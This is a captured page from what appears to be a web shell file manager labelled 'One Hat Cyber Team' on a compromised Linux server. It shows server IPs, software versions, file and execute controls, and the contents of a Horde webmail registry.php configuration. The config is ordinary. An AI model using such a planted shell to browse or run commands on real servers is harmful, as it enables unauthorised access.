⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.50
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
psa-horde
/
config
/
View File Name :
registry.php
_detectWebroot(); $this->applications = array( 'horde' => array( 'initial_page' => 'services/portal/index.php', 'name' => _("Horde"), 'provides' => 'horde', ), 'imp' => array( 'name' => _("Mail"), 'provides' => array( 'mail', 'contacts/favouriteRecipients' ) ), 'ingo' => array( 'name' => _("Filters"), 'provides' => array( 'filter', 'mail/blacklistFrom', 'mail/showBlacklist', 'mail/whitelistFrom', 'mail/showWhitelist', 'mail/applyFilters', 'mail/canApplyFilters', 'mail/showFilters', 'mail/newEmailFilter' ), 'menu_parent' => 'imp' ), 'sam' => array( 'name' => _("Spam"), // Add this line to registry.local.php if you want Sam to handle the // blacklist and whitelist filters instead of Ingo: // $this->applications['sam']['provides'] = array('mail/blacklistFrom', 'mail/showBlacklist', 'mail/whitelistFrom', 'mail/showWhitelist'); 'menu_parent' => 'imp' ), 'imp-menu' => array( 'app' => 'imp', 'menu_parent' => 'imp', 'status' => 'topbar', ), 'kronolith' => array( 'name' => _("Calendar"), 'provides' => 'calendar', ), 'kronolith-menu' => array( 'status' => 'topbar', 'app' => 'kronolith', 'topbar_params' => array( 'id' => 'menu' ), 'menu_parent' => 'kronolith', ), 'turba' => array( 'name' => _("Address Book"), 'provides' => array( 'contacts', 'clients/getClientSource', 'clients/clientFields', 'clients/getClient', 'clients/getClients', 'clients/addClient', 'clients/updateClient', 'clients/deleteClient', 'clients/searchClients' ), ), 'turba-menu' => array( 'app' => 'turba', 'menu_parent' => 'turba', 'status' => 'topbar', ), 'nag' => array( 'name' => _("Tasks"), 'provides' => 'tasks', ), 'nag-menu' => array( 'status' => 'topbar', 'app' => 'nag', 'topbar_params' => array( 'id' => 'menu' ), 'menu_parent' => 'nag', ), 'mnemo' => array( 'name' => _("Notes"), 'provides' => 'notes', ), 'mnemo-menu' => array( 'status' => 'topbar', 'app' => 'mnemo', 'menu_parent' => 'mnemo', ), 'others' => array( 'name' => _("Others"), 'status' => 'heading', ), 'trean' => array( 'name' => _("Bookmarks"), 'provides' => 'bookmarks', 'menu_parent' => 'others' ), 'trean-menu' => array( 'status' => 'topbar', 'app' => 'trean', 'menu_parent' => 'trean', ), 'ansel' => array( 'name' => _("Photos"), 'provides' => 'images', 'menu_parent' => 'others' ), 'wicked' => array( 'name' => _("Wiki"), 'provides' => 'wiki', 'menu_parent' => 'others' ), 'devel' => array( 'name' => _("Development"), 'status' => 'heading', 'menu_parent' => 'others', ), 'chora' => array( 'name' => _("Version Control"), 'menu_parent' => 'devel' ), 'chora-menu' => array( 'status' => 'topbar', 'app' => 'chora', 'menu_parent' => 'chora', ), 'whups' => array( 'name' => _("Tickets"), 'provides' => 'tickets', 'menu_parent' => 'devel', ), 'whups-menu' => array( 'status' => 'topbar', 'app' => 'whups', 'menu_parent' => 'whups', ), 'luxor' => array( 'name' => _("X-Ref"), 'menu_parent' => 'devel' ), 'info' => array( 'name' => _("Information"), 'status' => 'heading', 'menu_parent' => 'others', ), 'klutz' => array( 'name' => _("Comics"), 'menu_parent' => 'info' ), 'jonah' => array( 'name' => _("News"), 'provides' => 'news', 'menu_parent' => 'info' ), 'jonah-menu' => array( 'status' => 'topbar', 'app' => 'jonah', 'menu_parent' => 'jonah', ), 'office' => array( 'name' => _("Office"), 'status' => 'heading', 'menu_parent' => 'others', ), 'hermes' => array( 'name' => _("Time Tracking"), 'menu_parent' => 'office', 'provides' => 'time' ), 'hermes-stopwatch' => array( 'status' => 'topbar', 'app' => 'hermes', 'topbar_params' => array( 'id' => 'stopwatch', ), 'menu_parent' => 'hermes', ), 'hermes-menu' => array( 'status' => 'topbar', 'app' => 'hermes', 'topbar_params' => array( 'id' => 'menu' ), 'menu_parent' => 'hermes', ), 'sesha' => array( 'name' => _("Inventory"), /* Uncomment this line if you want Sesha to provide queue and * version names instead of Whups: */ // 'provides' => array('tickets/listQueues', 'tickets/getQueueDetails', 'tickets/listVersions', 'tickets/getVersionDetails'), 'menu_parent' => 'office', ), 'kolab' => array( 'name' => _("Kolab"), 'menu_parent' => 'myaccount' ), 'myaccount' => array( 'name' => _("My Account"), 'status' => 'heading', 'menu_parent' => 'others', ), 'gollem' => array( 'name' => _("File Manager"), 'menu_parent' => 'others', 'provides' => 'files', ), 'gollem-menu' => array( 'status' => 'topbar', 'app' => 'gollem', 'menu_parent' => 'gollem', ), 'passwd' => array( 'name' => _("Password"), 'menu_parent' => 'myaccount' ), 'website' => array( 'name' => _("Web Site"), 'status' => 'heading', 'menu_parent' => 'others', ), 'agora' => array( 'name' => _("Forums"), 'provides' => 'forums', 'menu_parent' => 'website' ), 'ulaform' => array( 'name' => _("Forms"), 'menu_parent' => 'website' ), 'vilma' => array( 'name' => _("Mail Admin"), 'menu_parent' => 'administration' ), 'content' => array( 'status' => 'hidden' ), 'timeobjects' => array( 'status' => 'hidden', 'provides' => 'timeobjects' ) );